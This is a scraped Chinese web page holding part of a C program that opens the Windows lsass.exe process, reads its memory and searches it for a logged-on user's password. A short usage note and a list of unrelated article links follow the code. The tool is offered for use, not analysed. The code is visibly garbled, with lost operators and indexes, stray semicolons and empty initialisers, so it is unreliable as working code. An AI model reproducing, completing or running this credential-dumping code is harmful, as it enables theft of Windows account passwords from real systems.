{
OffSet= strlen("Procedure")1;
if (strnicmp(&Buffer[iOffSet],"Call",strlen("Call")) == 0)
{
i= OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i)
{
if (Buffer == 0x02 && Buffer[i1] == 0 && Buffer[i2] == 0 && Buffer[i3] == 0 && Buffer[i4] == 0 && Buffer[i5] == 0 && Buffer[i6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i7;
for (; j < nSize; j= 2)
{
if (Buffer[j] >0)
{
Password[Count] = Buffer[j];
}
else
{
break;
}
}
return i7 // One Flag To Indicate We Find The Password
}
}
}
return -1 // Well,We Fail To Find The Password,And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters:; None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shotn");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);;;// Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:;;
//In: DWORD PID;;;;;-> The Lsass.exe"s PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
charBuffer[5 * 1024] = ;
DWORD; ByteGet = 0;
int;Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID) // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Processn");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet));;;;;// Read The Memory From Lsass.exe
{
printf("Fail To Read Memoryn");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet) // Search The Password
if (Found >= 0);;;;;// We May Find The Password
{
if (strlen(Password) > 0);;;;;// Yes,We Find The Password Even We Don"t Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> "%s"n",FoundBaseAddress,Password);
}
}
else
{
printf("Fail To Find The Passwordn");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters:; None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
用法:
1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
推荐阅读
- 破山寺就是今江苏什么境内著名的佛寺禅院 破山寺是现在哪个佛寺禅院
- 抖音火山版在哪直播?抖音火山版直播教程
- 巧妙突破Win 2003系统的种种限制
- 喜马拉雅在哪里设置音质?喜马拉雅音质设置教程
- Windows2003网络服务器安全攻略
- Windows2003下提高FSO安全性
- excel技巧
- 紫金城是现在的故宫吗?
- 王者荣耀帧率显示在哪
- 苹果多个机型或在iPhone15系列后停产 苹果为什么停产以前的机型